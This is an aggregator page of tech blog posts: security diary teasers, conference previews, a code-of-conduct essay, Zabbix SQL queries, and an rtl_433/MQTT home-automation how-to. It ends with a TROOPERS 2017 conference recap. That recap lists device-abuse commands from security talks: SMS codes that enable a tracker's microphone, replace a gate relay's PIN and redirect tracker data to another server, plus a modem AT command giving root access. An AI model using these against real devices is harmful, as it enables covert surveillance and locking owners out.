Quantcast
Channel: Planet Grep
Viewing all 4959 articles
Browse latest View live

Xavier Mertens: [SANS ISC Diary] Retro Hunting!

$
0
0

I published the following diary on isc.sans.org: “Retro Hunting!“.

For a while, one of the security trends is to integrate information from 3rd-party feeds to improve the detection of suspicious activities. By collecting indicators of compromize, other tools may correlate them with their own data and generate alerts on specific conditions. The initial goal is to share as fast as possible new IOC’s with peers to improve the detection capability and, maybe, prevent further attacks or infections… [Read more]

[The post [SANS ISC Diary] Retro Hunting! has been first published on /dev/random]


Xavier Mertens: TROOPER 10 Ahead!

$
0
0

Next week, it’s already the 10th edition of the TROOPERS conference in Heidelberg, Germany. I’ll be present and cover the event via Twitter and daily wrap-ups. It will be my 3rd edition and since the beginning, I was impressed by the quality of the organization from the content point of view but also from a technical point of view. There isn’t a lot of events that provide SIM cards to use their own mobile network! Besides the classic activities, there is the hacker-run, Packetwars or the charity action with auctions.

The event will be split in two phase: Monday & Tuesday, NGI will take place or “Next Generation Internet” and propose two differents tracks. One focussing on IPv6 and the second on IoT. The schedule is available here. Here is the selection of talks that I’ll (try to) attend and cover:

  • What happened to your home? IoT Hacking and Forensic with 0-day
  • IPv6 Configuration Approaches for Servers
  • IoT to Gateway
  • Dissecting modern (3G/4G) cellular modems
  • RIPE Atlas, Measuring the Internet
  • Hidden in plain sight; How possibly could a decades old standard be broken?
  • An introduction to automotive ECU research
  • PUFs ‘n Stuff: Getting the most of the digital world through physical identities
  • BLE authentication design challenges on smartphone controlled IoT devices: analyzing Gogoro Smart Scooter
  • Metasploit Hardware Bridge Hacking
  • Hacking TP-Link Devices

On Wednesday and Thursday, regular talks are scheduled. There are three concurrent tracks: “Attack & research”, “Defense & management” and “SAP”. Personaly, SAP is less interesting (not working with this monster). Again, here is my current selection (most of them are from the “defense & management” track):

  • Hunting Them All
  • Securing Network Automation
  • Vox Ex Machina
  • Architecting a Modern Defense using Device Guard
  • Exploring North Korea’s Surveillance Technology
  • Arming Small Security Programs: Network Baseline Generation and Alerts with Bropy
  • PHP Internals: Exploit Dev Edition
  • How we hacked Distributed Configuration Management Systems
  • Ruler – Pivoting Through Exchange
  • Demystifying COM
  • Graph me, I’m famous! – Automated static malware analysis and indicator extraction for binaries
  • Windows 10 – Endpoint Security Improvements and the Implant since Windows 2000

Nice program, plenty of interesting topics! Keep an eye here for some wrap-up’s. And, if you’re in Heidelberg, ping me if you want to chat.

 

[The post TROOPER 10 Ahead! has been first published on /dev/random]

Xavier Mertens: Keep Calm and Revoke Access

$
0
0

For the last 24 hours, the Twitter landscape has seen several official accounts hacked. The same Tweet was posted thousand times. It was about the political conflict between Turkey and Holland:

Amnesty Fake Tweet

Many other accounts were affected (like the one of the EU Commission). Usually, Twitter accounts are hijacked simply due to weak credentials used to manage them and the lack of controls like 2FA. But this time, it was different. What do all those accounts have in common? They used a 3rd party service called Twitter Counter [Note: the Twitter Counter web site is currently “under maintenance”]. This service, amongst hundreds of others, offers nice features on top of Twitter to offer a better visibility of your account. To achieve this, services request access to your account. Access levels can be multiple from reading your timeline, seeing who you follow, posting Tweets, up to changing your settings. More info is provided here by Twitter. For me,  those services could be considered as plugins for modern CMS. They provide nice features but can also increase the attack surface. That’s exactly the scenario seen today.

How to protect against this kind of attack? First, do not link your Twitter account to untrusted or suspicious applications. And, exactly like mobile apps, do not grant access to everything! Least privileges must be applied. Why allow a statistics service to change your settings if a read-only access to your timeline is sufficient?

Finally, the best advice is to visit the following link at regular interval: https://twitter.com/settings/applications. During your first visit, you could be surprised to find so many applications linked to your account! Here is a small example:

Twitter Apps

Ideally, this list must be reviewed at regular interval and revoke access to applications that you don’t use anymore, to apps that you don’t remind why you granted some permissions or any other suspicious app! Tip: Create a reminder to perform this task every x months.

Oh, don’t forget that the same applies to other social networks too, like Facebook.

Stay safe!

[The post Keep Calm and Revoke Access has been first published on /dev/random]

Wouter Verhelst: Codes of Conduct

$
0
0

These days, most large FLOSS communities have a "Code of Conduct"; a document that outlines the acceptable (and possibly not acceptable) behaviour that contributors to the community should or should not exhibit. By writing such a document, a community can arm itself more strongly in the fight against trolls, harassment, and other forms of antisocial behaviour that is rampant on the anonymous medium that the Internet still is.

Writing a good code of conduct is no easy matter, however. I should know -- I've been involved in such a process twice; once for Debian, and once for FOSDEM. While I was the primary author for the Debian code of conduct, the same is not true for the FOSDEM one; I was involved, and I did comment on a few early drafts, but the core of FOSDEM's current code was written by another author. I had wanted to write a draft myself, but then this one arrived and I didn't feel like I could improve it, so it remained.

While it's not easy to come up with a Code of Conduct, there (luckily) are others who walked this path before you. On the "geek feminism" wiki, there is an interesting overview of existing Open Source community and conference codes of conduct, and reading one or more of them can provide one with some inspiration as to things to put in one's own code of conduct. That wiki page also contains a paragraph "Effective codes of conduct", which says (amongst others) that a good code of conduct should include

Specific descriptions of common but unacceptable behaviour (sexist jokes, etc.)

The attentive reader will notice that such specific descriptions are noticeably absent from both the Debian and the FOSDEM codes of conduct. This is not because I hadn't seen the above recommendation (I had); it is because I disagree with it. I do not believe that adding a list of "don't"s to a code of conduct is a net positive to it.

Why, I hear you ask? Surely having a list of things that are not welcome behaviour is a good thing, which should be encouraged? Surely such a list clarifies the kind of things your does not want to see? Having such a list will discourage that bad behaviour, right?

Well, no, I don't think so. And here's why.

Enumerating badness

A list of things not to do is like a virus scanner. For those not familiar with these: on some operating systems, there is specific piece of software that everyone recommends you run, which checks if particular blobs of data appear in files on the disk. If they do, then these files are assumed to be bad, and are kicked out. If they do not, then these files are assumed to be not bad, and are left alone (for the most part).

This works if we know all the possible types of badness; but as soon as someone invents a new form of badness, suddenly your virus scanner is ineffective. Additionally, it also means you're bound to continually have to update your virus scanner (or, as the case may be, code of conduct) to a continually changing hostile world. For these (and other) reasons, enumerating badness is listed as number 2 in security expert Markus Ranum's "six dumbest ideas in computer security," which was written in 2005.

In short, a list of "things not to do" is bound to be incomplete; if the goal is to clarify the kind of behaviour that is not welcome in your community, it is usually much better to explain the behaviour that is wanted, so that people can infer (by their absense) the kind of behaviour that isn't welcome.

This neatly brings me to my next point...

Black vs White vs Gray.

The world isn't black-and-white. We could define a list of welcome behaviour -- let's call that the whitelist -- or a list of unwelcome behaviour -- the blacklist -- and assume that the work is done after doing so. However, that wouldn't be true. For every item on either the white or black list, there's going to be a number of things that fall somewhere in between. Let's call those things as being on the "gray" list. They're not the kind of outstanding behaviour that we would like to see -- they'd be on the white list if they were -- but they're not really obvious CoC violations, either. You'd prefer it if people don't do those things, but it'd be a stretch to say they're jerks if they do.

Let's clarify that with an example:

Is it a code of conduct violation if you post links to pornography websites on your community's main development mailinglist? What about jokes involving porn stars? Or jokes that denigrate women, or that explicitly involve some gender-specific part of the body? What about an earring joke? Or a remark about a user interacting with your software, where the women are depicted as not understanding things as well as men? Or a remark about users in general, that isn't written in a gender-neutral manner? What about a piece of self-deprecating humor? What about praising someone else for doing something outstanding?

I'm sure most people would agree that the first case in the above paragraph should be a code of conduct violation, whereas the last case should not be. Some of the items in the list in between are clearly on one or the other side of the argument, but for others the jury is out. Let's call those as being in the gray zone. (Note: no, I did not mean to imply that the list is ordered in any way ;-)

If you write a list of things not to do, then by implication (because you didn't mention them), the things in the gray area are okay. This is especially problematic when it comes to things that are borderline blacklisted behaviour (or that should be blacklisted but aren't, because your list is incomplete -- see above). In such a situation, you're dealing with people who are jerks but can argue about it because your definition of jerk didn't cover teir behaviour. Because they're jerks, you can be sure they'll do everything in their power to waste your time about it, rather than improving their behaviour.

In contrast, if you write a list of things that you want people to do, then by implication (because you didn't mention it), the things in the gray area are not okay. If someone slips and does something in that gray area anyway, then that probably means they're doing something borderline not-whitelisted, which would be mildly annoying but doesn't make them jerks. If you point that out to them, they might go "oh, right, didn't think of it that way, sorry, will aspire to be better next time". Additionally, the actual jerks and trolls will have been given less tools to argue about borderline violations (because the border of your code of conduct is far, far away from jerky behaviour), so less time is wasted for those of your community who have to police it (yay!).

In theory, the result of a whitelist is a community of people who aspire to be nice people, rather than a community of people who simply aspire to be "not jerks". I know which kind of community I prefer.

Giving the wrong impression

During one of the BOFs that were held while I was drafting the Debian code of conduct, it was pointed out to me that a list of things not to do may give the impression to people that all these things on this list do actually happen in the code's community. If that is true, then a very long list may produce the impression that the given community is a community with a lot of problems.

Instead, a whitelist-based code of conduct will provide the impression that you're dealing with a healthy community. Whether that is the case obviously depends on more factors than just the code of conduct itself, but it will put people in the right mindset for this to become something of a self-fulfilling prophecy.

Conclusion

Given all of the above, I think a whitelist-based code of conduct is a better idea than a blacklist-based one. Additionally, in the few years since the Debian code of conduct was accepted, it is my impression that the general atmosphere in the Debian project has improved, which would seem to confirm that the method works (but YMMV, of course).

At any rate, I'm not saying that blacklist-based codes of conduct are useless. However, I do think that whitelist-based ones are better; and hopefully, you now agree, too ;-)

Mattias Geniar: Finding the biggest data (storage) consumers in Zabbix

$
0
0

The post Finding the biggest data (storage) consumers in Zabbix appeared first on ma.ttias.be.

If you run Zabbix long enough, eventually your database will grow to sizes you'd rather not see. And that begs the question: what items are causing the most storage in my Zabbix backend, be it MySQL, PostgreSQL or something else?

I investigated the same questions and found the following queries to be very useful.

Before you start to look into this, make sure you cleanup your database of older orphaned records first, see an older post of mine for more details.

What items have the most value records?

These probably also consume the most diskspace.

For the history_uint table (holds all integer values):

SELECT COUNT(history.itemid), history.itemid, i.name, i.key_, h.host
FROM history_uint AS history
LEFT JOIN items AS i ON i.itemid = history.itemid
LEFT JOIN hosts AS h ON i.hostid = h.hostid
GROUP BY history.itemid
ORDER BY COUNT(history.itemid) DESC
LIMIT 100;

For the history table (holds all float & double values):

SELECT COUNT(history.itemid), history.itemid, i.name, i.key_, h.host
FROM history AS history
LEFT JOIN items AS i ON i.itemid = history.itemid
LEFT JOIN hosts AS h ON i.hostid = h.hostid
GROUP BY history.itemid
ORDER BY COUNT(history.itemid) DESC
LIMIT 100;

For the history_text table (holds all text values):

SELECT COUNT(history.itemid), history.itemid, i.name, i.key_, h.host
FROM history_text AS history
LEFT JOIN items AS i ON i.itemid = history.itemid
LEFT JOIN hosts AS h ON i.hostid = h.hostid
GROUP BY history.itemid
ORDER BY COUNT(history.itemid) DESC
LIMIT 100;

The post Finding the biggest data (storage) consumers in Zabbix appeared first on ma.ttias.be.

Philip Van Hoof: Duck typing

$
0
0

Imagine you have a duck. Imagine you have a wall. Now imagine you throw the duck with a lot of force against a wall. Duck typing means that the duck hitting the wall quacks like a duck would.

ps. Replace wall with API and duck with ugly stupid script written by an idiot. You can leave quacks.

Dries Buytaert: How the YMCA uses Drupal to accelerate its mission

$
0
0

The YMCA is a leading nonprofit dedicated to strengthening communities through youth development, healthy living and social responsibility. Today, the YMCA serves more than 58 million people in 130 countries around the world. The YMCA is a loose federation, meaning that each association operates independently to best meet the needs of the local community. In the United States alone, there are 874 associations, each with their own CEO and board of directors. As associations vary in both size and scale, each YMCA is responsible for maintaining their own digital systems and tools at their own expense.

In 2016, the YMCA of Greater Twin Cities set out to develop a Drupal distribution, called Open Y. The goal of Open Y was to build a platform to enable all YMCAs to operate as a unified brand through a common technology.

Features of the Open Y platform

Open Y strives to provide the best customer experience for their members. The distribution, developed on top of Drupal 8 in partnership with Acquia and FFW, offers a robust collection of features to deliver a multi channel experience for websites, mobile applications, digital signage, and fitness screens.

On an Open Y website customers can schedule personal training appointments, look up monthly promotions, or donate to their local YMCA online. Open Y also takes advantage of Drupal 8's APIs to integrate all of their systems with Drupal. This includes integration with Open Y's Customer Relationship Management (CRM) and eCommerce partners, but also extends to fitness screens and wearables like Fitbit. This means that Open Y can use Drupal as a data repository to serve content, such as alerts or program campaigns, to digital signage screens, connected fitness consoles and popular fitness tracking applications. Open Y puts Drupal at the core of their digital platform to provide members with seamless and personalized experiences.

Philosophy of collaboration

The founding principle of Open Y is that the platform adopts a philosophy of collaboration that drives innovation and impact. Participants of Open Y have developed a charter that dictates expectations of collaboration and accountability. The tenets of the charter allow for individual associations to manage their own projects and to adopt the platform at their own pace. However, once an association adopts Open Y, they are expected to contribute back any new features to the Open Y distribution.

As a nonprofit, YMCAs cannot afford expensive proprietary licenses. Because participating YMCAs collaborate on the development of Open Y, and because there are no licensing fees associated with Drupal, the total cost of ownership is much lower than proprietary solutions. The time and resources that are saved by adopting Drupal allows YMCAs around the country to better focus on their customers' experience and lean into innovation. The same could not be achieved with proprietary software.

For example, the YMCA of Greater Seattle was the second association to adopt the Open Y platform. When building its website, the YMCA of Greater Seattle was able to repurpose over a dozen modules from the YMCA of the Greater Twin Cities. That helped Seattle save time and money in their development. Seattle then used their savings to build a new data personalization module to contribute back to the Open Y community. The YMCA of the Greater Twin Cities will be able to benefit from Seattle's work and adopt the personalization features into its own website. By contributing back and by working together on the Open Y distribution, these YMCAs are engaging in a virtuous cycle that benefits their own projects.

The momentum of Open Y

In less than one year, 18 YMCA associations have committed to adopting Open Y and over 22 other associations are currently evaluating the platform. Open Y has created a platform that all stakeholders under the YMCA brand can use to collaborate through a common technology and a shared philosophy.

Open Y is yet another example of how organizations can challenge the prevailing model of digital experience delivery. By establishing a community philosophy that encourages contribution, Open Y has realized accelerated growth, feature development, and adoption. Organizations that are sharing contributions and embracing collaboration are evolving their operating models to achieve more than ever before.

Because I am passionate about the Open Y team's mission and impact, I have committed to be an advisor and sponsor to the project. I've been advising them since November 2016. Working with Open Y is a way for me to give back, and it's been very exciting to witness their progress first hand.

If you want to help contribute to the Open Y project, consider attending their DrupalCon Baltimore session on building custom Drupal distributions for federated organizations. You can also connect with the Open Y team directly at OpenYMCA.org.

Philip Van Hoof: Merkel bashing

$
0
0

It seems to be the new sport of nitwit moronic world leaders like Trump and Erdogan to bash Frau Merkel.

It makes me respect her more.


Xavier Mertens: [SANS ISC Diary] Example of Multiple Stages Dropper

$
0
0

I published the following diary on isc.sans.org: “Example of Multiple Stages Dropper“.

If some malware samples remain simple (see my previous diary), others try to install malicious files in a smooth way to the victim computers. Here is a nice example that my spam trap captured a few days ago. The mail looks like a classic phishing attempt… [Read more]

[The post [SANS ISC Diary] Example of Multiple Stages Dropper has been first published on /dev/random]

FOSDEM organizers: Video work almost finished

$
0
0
Almost all of the video recordings from FOSDEM 2017 have been cut, transcoded, and released. There are a handful of talks left to fix up, which will happen no later than next weekend. The weekend after that, we plan to shut down this year's video-processing infrastructure, unless something important pops up. Videos are linked from the individual schedule pages for the talks and the full schedule page. They are mirrored from video.fosdem.org. While all videos have been reviewed by a human before they were released, it remains possible that one or more issues fell through the cracks. Therefore, if you舰

Xavier Mertens: [SANS ISC] Searching for Base64-encoded PE Files

$
0
0

I published the following diary on isc.sans.org: “Searching for Base64-encoded PE Files“.

When hunting for suspicious activity, it’s always a good idea to search for Microsoft Executables. They are easy to identify: They start with the characters “MZ” at the beginning of the file. But, to bypass classic controls, those files are often obfuscated (XOR, Rot13 or Base64)… [Read more]

[The post [SANS ISC] Searching for Base64-encoded PE Files has been first published on /dev/random]

Tom Laermans: Getting your CurrentCost (433MHz) data into OpenHAB using an RTL-SDR dongle and MQTT

$
0
0

CurrentCost?

CurrentCost is a UK company founded in 2010 which provides home power measuring hardware. Their main product is a transmitter which uses an inductive clamp to measure power usage of your household. On top of that, they also provide Individual Appliance Monitors (IAMs) which sit between your device and the outlet, and measure its power usage.

The transmitters broadcast their findings wirelessly. To display the data, a number of different displays are sold, which can indicate total usage, per-IAM data, trending and even cost if you care to set that up. I myself have the EnviR, which has USB connectivity (with an optional cable) so you can process the CurrentCost data on your computer. Up to 9 IAMs can be connected to the EnviR.

I bought my CurrentCost products over 5 years ago, it does look like they are still on sale. CurrentCosts operates an eBay store where you can buy their hardware, if you’re not in the UK.

Important note: Should you decide to acquire any of their IAM hardware, do note that their “EU” IAM plugs are in fact “Schuko” type F type, which is used in Germany and The Netherlands, with side ground contacts instead of a grounding pin. That wouldn’t be so much of an issue, except that they don’t have an accommodating hole for the pin, so they won’t fit standard EU (non-German, non-Dutch, type E) outlets without a converter! The device-side is usually fine, as most if not all plugs also support side ground contacts, and if they don’t, at least the lack of a pin does not impede plugging it in.

OpenHAB?

OpenHAB is an open source, Java-powered Home Automation Bus; what this basically means is it’s a centralized hub that can connect to many systems that have found their way into your house, such as your smart TV, your ethernet-capable Audio Receiver, Hue lighting, Z-Wave- or Zigbee-powered accessories, HVAC systems, Kodi, CUPS, and even anything that speaks SNMP or MQTT or Amazon’s Alexa. It’s pretty much fully able to integrate into anything you can throw at it.

If you’re not already using OpenHAB, this post may not be very useful to you… Yet.

MQTT?

MQTT (short for Message Queue Telemetry Transport) is publish-subscribe-based “lightweight” messaging protocol. In short, you run a (or multiple) MQTT broker, and then clients can “subscribe” to certain topics (topics being freehand names, pretty much), and other clients, or the same ones even, can “publish” data in those same topics.

MQTT is a quick and elegant solution to have data circulate between different services, over the network or on the local machine – the fact that that data is broadcast over certain topics means multiple listeners (“subscribers”) can all act on that same data being published.

OpenHAB supports MQTT in both directions – it can listen to incoming topics, or broadcast certain things over MQTT as well.

The configuration below assumes you already have an MQTT broker to publish the radio messages to; setting up Mosquitto or similar is out of scope for this article.

Getting data out of CurrentCost

The EnviR outputs the following string regularly (every 6 seconds) over its USB serial port:

<msg><src>CC128-v1.48</src><dsb>00012</dsb><time>22:18:34</time><tmpr>24.9</tmpr><sensor>0</sensor><id>02015</id><type>1</type><ch1><watts>00876</watts></ch1></msg>

This is a line of data reporting power data sent by sensor ID 2015 (every sensor has their own 12-bit ID), of type 1 (this is either the main unit, or an IAM) reporting 876W on the first channel. The <tmpr> field is indeed a temperature reading, this is powered by a temperature sensor inside the EnviR and it simply measures the temperature where your display is located.

Back in 2012, I wrote a set of PHP scripts parsing this data and putting it into separate files in /tmp, with a separate script then throwing this data into RRD files every minute to be visualised in graphs. I never published it because to be frank it was a bit of an ugly hack. However it did work, and I had perfect visibility into when my 3 monitors went into standby, when the TV/Home theater amplifier was on, etc.

After getting a taste of this, spurred on by JP, I dived into Home Automation and ended up using OpenHAB. For years I’ve “planned” to write a CurrentCost binding for OpenHAB, so it would natively support the XML serial protocol, and just read out everything automatically. I never got around to figuring out how to create an OpenHAB binding though, so my stats were separate in those RRD files for years. When I moved, I didn’t even reinstall the CurrentCost sensors, as I was already using Z-Wave based power sensors for most things I wanted to measure.

In the meanwhile I also encountered current-cost-forwarder which listens for the XML data and sends it over to an MQTT broker. That did alleviate the need for a dedicated binding, but I never got around to trying this out, so I can’t tell you how well it works.

The magic of RTLSDR

RTLSDR is a great software defined radio (SDR) based on very cheap Realtek RTL28xx chips, originally meant to receive DVB-T broadcast. This means you can pretty much listen in on any frequency between ~22MHz and ~1100MHz, including FM radio, ADS-B aircraft data, and many others. And by cheap, I do mean cheap, you can find RTLSDR-compatible USB dongles on eBay for 5€ or less!

CurrentCost transmitters use the 433MHz frequency, like many other home devices (car keys, wireless headphones, garage openers, weather stations, …). As I was playing around with the rtl_433 tool, which uses RTLSDR to sniff 433MHz communications, I noticed my CurrentCost sensor data passing by as well. That gave me the idea for this system, and the setup in use that led to this blog post.

Additional advantages for this are that you can now use as many IAMs as you want and are no longer limited to 9, and there is no need to have the EnviR connected to one of your server’s USB ports. In fact, you don’t even need the EnviR display at all, and can even drop the base transmitter if you only want to read out IAM data.

As an extra, any other communication picked up by rtl_433 on 433MHz will also be automatically piped into MQTT for consumption by anything else you want to run. If you (or your neighbours!) have a weather station, anemometer or anything else transmitting on 433MHz (and supported by rtl_433), you can consume this data in OpenHAB just as well!

Sniffing the 433MHz band

First off, let’s install rtl_433:

~# apt-get install rtl-sdr librtlsdr-dev cmake build-essential
~# git clone https://github.com/merbanan/rtl_433.git
Cloning into 'rtl_433'...
remote: Counting objects: 5722, done.
(...)
Checking connectivity... done.
~# cd rtl_433/
~/rtl_433# mkdir build
~/rtl_433# cd build
~/rtl_433/build# cmake ..
-- The C compiler identification is GNU 4.9.2
(...)
-- Build files have been written to: /root/rtl_433/build
~/rtl_433/build# make
~/rtl_433/build# make install

Once it’s been installed, let’s do a test run. If you have CurrentCost transmitters plugged in, you should see their data flash by. Unfortunately, nobody in my neighbourhood seems to have any weather stations or outdoor temperature sensors, so only CurrentCost output for me:

~# rtl_433 -G
Using device 0: Generic RTL2832U
Found Rafael Micro R820T tuner
Exact sample rate is: 250000.000414 Hz
Sample rate set to 250000.
Bit detection level set to 0 (Auto).
Tuner gain set to Auto.
Reading samples in async mode...
Tuned to 433920000 Hz.
2017-02-27 17:53:12 : CurrentCost TX
Device Id: 2015
Power 0: 26 W
Power 1: 0 W
Power 2: 0 W

To end the program, press ctrl-C.

What we can see in the output here:
Device Id: the same device ID as was reported by the EnviR’s XML protocol. It likely changes when you press the pair button.
Power 0: This is the only power entry you’ll see for IAM modules, the base device may also report data for the second and third clamp.

It is possible you see the following error when running rtl_433:

Kernel driver is active, or device is claimed by second instance of librtlsdr.
In the first case, please either detach or blacklist the kernel module
(dvb_usb_rtl28xxu), or enable automatic detaching at compile time.

This means your OS has autoloaded the DVB drivers when you plugged in your USB stick, before you installed the rtl-sdr package. You can unload them manually:

rmmod dvb_usb_rtl28xxu rtl2832

The rtl-sdr package contains a blacklist entry for this driver, so it shouldn’t be a problem anymore from now on. Then, try running the command again.

Relaying 433MHz data to MQTT

Install mosquitto-clients, which provides mosquitto_pub which will be used to publish data to the broker:

~# apt-get install mosquitto-clients

Next, install the systemd service file which will run the relay for us:

~# cat <<EOF /etc/systemd/system/rtl_433-mqtt.service
[Unit]
Description=rtl_433 to MQTT publisher
After=network.target
[Service]
ExecStart=/bin/bash -c "/usr/local/bin/rtl_433 -q -F json |/usr/bin/mosquitto_pub -h <your.broker.hostname> -i RTL_433 -l -t RTL_433/JSON"
Restart=always
RestartSec=5
[Install]
WantedBy=multi-user.target
EOF
~# systemctl daemon-reload
~# systemctl enable rtl_433-mqtt

This will publish JSON-formatted messages containing the 433MHz data to your MQTT broker on the RTL_433/JSON topic.

Don’t forget to replace your broker’s hostname on the correct line. I tried to make it use an Environment file first, but unfortunately ran into a few issues using those variables, due to needing to run the command in an actual shell because of the pipe. If you figure out a way to make that work, please do let me know.

See if it works

We can subscribe to the MQTT topic using the mosquitto_sub tool from the mosquitto-clients package:

mosquitto_sub -h <your.broker.hostname> -t RTL_433/JSON

Doing this should yield a number of output lines such as this:

{"time" : "2017-03-19 21:26:25", "model" : "CurrentCost TX", "dev_id" : 2015, "power0" : 0, "power1" : 0, "power2" : 0}

Press Ctrl-C to exit the utility. If this didn’t yield any useful JSON output, check the status of the service with systemctl status rtl_433-mqtt and correct any issues.

Add items to OpenHAB

The following instructions were written for OpenHAB 1.x. Even though OpenHAB 2.x has a new way of adding “things” and “channels”, they work on that version as well – there is no automatic web-based configuration for MQTT items anyway.

Create items such as these in the OpenHAB items file of your choice (where this is exactly depends on your OpenHAB major version and whether you installed using debian packages or from the zip file).

Number Kitchen_Boiler_Power "Kitchen Boiler [%.1f W]" (GF_Kitchen) { mqtt="<[your.broker.hostname:RTL_433/JSON:state:JSONPATH($.power0):.*\"dev_id\" \\: 2015,.*]"}

Replace the dev_id being matched (2015 in the example above) with the ID of your CurrentCost transmitter. As all rtl_433 broadcasts come in on the same topic, a regular expression is used to match a single Device Id. If you want to read another phase, replace power0 by power1 or power2.

If you want to receive other 433MHz broadcasts, you may need to change the regex to make sure it’s only catching CurrentCost sensors – although the dev_id match alone might be enough. Let me know!

&url Writing informative technical how-to documentation takes time, dedication and knowledge. Should my blog series have helped you in getting things working the way you want them to, or configure certain software step by step, feel free to tip me via PayPal (paypal@powersource.cx) or the Flattr button. Thanks!

Xavier Mertens: TROOPERS 2017 Day #1 Wrap-Up

$
0
0

I’m in Heidelberg (Germany) for the 10th edition of the TROOPERS conference. The regular talks are scheduled on Wednesday and Thursday. The two first days are reserved for some trainings and a pre-conference event called “NGI” for “Next Generation Internet” focusing on two hot topics: IPv6 and IoT. As said on the website: “NGI aims to provide discussion on how to secure these core technologies by bringing together practitioners from this space and some of the smartest researchers of the respective fields”. I initially planned to attend talks from both worlds but I stayed in the “IoT” tracks because many talks were interesting.

The day started with a keynote by Steve Lord: ”Of Unicorns and replicants”. Steve flagged his keynote as a “positive” talk (usually, we tend to present negative stuff). It started with some facts like “The S in IoT stands for Security” and a recap of the IoT history. This is clearly not a new idea. The first connected device was a Coca-Cola machine that was available via finger in… 1982! Who’s remember this old-fashioned protocol? In 1985, came the first definition of “IoT”: It is the integration of people, processes and technology with connectable devices and sensors to enable remote monitoring status. In 2000, LG presented its very first connected fridge. 2009 was a key year with the explosion of crowdfunding campaigns. Indeed, many projects were born due to the financial participations of many people. It was a nice way to bring ideas to life. In 2015, Vizio smart TV’s started to watch at you. Of course, Steve talked also about the story of St-Jude Medical and their bad pacemakers story. Common IoT problems are: botnets, endpoints, the overreach (probably the biggest problem) and the availability (You remember the outage that affected Amazon a few days ago?). The second part of the keynote was indeed positive and Steve reviewed the differences between 2015 – 2017. In the past, cloud solutions were not so mature, there was communication issues, little open guidance and unrealistic expectations. People learn by mistakes and some companies don’t want to have nightmare stories like others and are investing in security. So, yes, things are going (a little bit) better because more people are addressing security issues.

The first talk was “IoT hacking and Forensic with 0-day” by Moonbeom Park& Soohyun Jin. More and more IoT devices have been involved in security incident cases. Mirai is one of the latest examples. To address this problem, the speakers explained their process based on these following steps: Search for IoT targets, analyze the filesystem or vulnerabilities, attack and exploit, analyze the artefacts, install a RAT and control using a C&C then perform incident response using forensic skills. The example they used was a vacuum robot with a voice recording feature. The first question is just… “why?”. They explained how to compromize the device which was, at the beginning, properly hardened.  But, it was possible to attack the protocol used to configure it. Some JSON data was sent in clear text with the wireless configuration details. Once the robot reconfigured to use a rogue access-point, root access on the device was granted. That’s nice but how to control the robot, its camera and microphone? To idea was to turn in into a spying device. They explained how to achieve this and played a nice demo:

Vacuum robot spying device

So, why do we need IoT forensics? IoT devices can be involved in incidents.Issues? One of the issues is the way data are stored. There is no HD but flash memory. OS remains the first OS used by IoT devices (73% according to the latest IoT developers survey). It is important to be able to extract the filesystem from such devices to understand how they work and to collect logs. Usually, filesystems are based on SquashFS and UBIFS. Tools were presented to access those data directly from Python. Example: the ubi_reader module. Once the filesystem details accessible, the forensic process remains the same.

The next talk was dedicated to SDR (Software Defined Radio) by Matt Knight& Marc Newline from Bastille: “So you want to hack radios?”. The idea behind this talk was to open our eyes on all the connected devices that implement SDR. Why should we care about radio communications? Not that they are often insecure but they are deployed everywhere. They are also built on compromises: big size and costs constraints, weak batteries, the deployment scenarios are challenging and, once in the wild, they are difficult to patch. Matt and Marc explained during the talk how to perform reverse engineering. They are two approaches: hardware & software defined radio. They reviewed pro & con. How to perform reverse engineering a radio signal? Configure yourself as a receiver and try to map symbols. This is a five steps process:

  • Identify the channel
  • Identify the modulation
  • Determine the symbol rate
  • Synchronize
  • Extract symbols

In many cases, OSINT is helpful to learn how it works (find online documentation). Many information is publicly available (example: on the FCC website – Just check for the FCC ID on the back of the device to get interesting info). They briefly introduced the RF concept then the reverse engineering workflow. To achieve this, they based the concept on different scenarios:

  • A Z-Wave home automation protocol
  • A door bell (capture button info and then replay to make the doorbell ring of course
  • An HP wireless keyboard/mouse

After the lunch, Vladimir Wolstencroft presented “SIMBox Security: Fraud, Fun & Failure”. This talk was tagged as TLP:RED so no coverage but very nice content! It was one of my best talk for today.

The next one was about the same topic: “Dissecting modern cellular 3G/4G modems” by Harald Welte. This talk is the result of a research conducted by Harald. His company was looking for a new M2M (“Machine to Machine”) solution. They searched interesting devices and started to see what was in the box. Once the good candidate found (the EC2O from Quectel), they started a security review and, guess what, they made nice findings. First, the device contained some Linux code. Based on this, all manufacturers have to respect the GPL and to disclose the modified source code. It takes a long time to get the information from Quectel). By why is Linux installed on this device? For Harald, it just increased the complexity. Here is a proof with the slide explaining how the device is rebooted:

Reboot Process

Crazy isn’t it? Another nice finding was the following AT command:

AT+QLINUXCMD=

It allows to send Linux commands to the devices in read/write mode and as root. What else?

The last talk “Hacks & case studies: Cellular communications” was presented by Brian Butterly. Brian’s motto is “to break things you must understand how they work”. The first step, read as much as possible, then build your lab to play with the selected targets. Many IoT devices today use GSM networks to interact with them via SMS or calls. Others also support TCP/IP communications (data). After a brief introduction to mobile network and how to deploy your own. An important message from Brian: Technically, nothing prevents to broadcast valid networks ID’s (but the law does it :-).

It’s important to understand how a device connects to a mobile network:

  • First, connect to its home network if available
  • Otherwise, do NOT connect to a list of blacklisted networks
  • Then connect to the network with the strongest signal.

If you deploy your own mobile network, you can make target devices connect to your network and play MitM. So, what can we test? Brian reviewed different gadgets and how to abuse them / what are their weaknesses.

First case: a small GPS Tracker with an emergency button. The Mini A8 (price: 15€). Just send a SMS with “DW” and the device will reply with a SMS containing the following URL:

http://gpsui.net/smap.php?lac=1&cellid=2&c=262&n=23&v=6890 Battery:70%

This is not a real GPS tracker, it returns the operation (“262” is Germany) and tower cell information. If you send “1111”, it will enable the built-in microphone. When the SOS button is pressed, a message is sent to the “authorized” numbers. The second case was a gate relay (RTU5025 – 40€). It allows opening a door via SMS or call. It’s just a relay in fact. Send “xxxxCC” (xxxx is the pin) to unlock the door. Nothing is sent back if the PIN is wrong. This means that it’s easy to brute force the device. Even better, once you found the PIN, you can send “xxxxPyyyy” to replace the PIN xxxx with a new one yyyy (and lock out the owner!). The next case was the Smanos X300 home alarm system (150€). Can be also controlled by SMS or calls (to arm, disarm and get notifications). Here again, there is a lack of protection and it’s easy to get the number and to fake authorized number to just send a “1” or “0”.

The next step was to check IP communications used by devices like the GPS car tracker (TK105 – 50€). You can change the server using the following message:

adminip 123456 101.202.101.202 9000

And define your own web server to get the device data. More fun, the device has a relay that can be connected to the car oil pump to turn the engine off (if the car is stolen). It also has a microphone and speaker. Of course, all communications occur over HTTP.

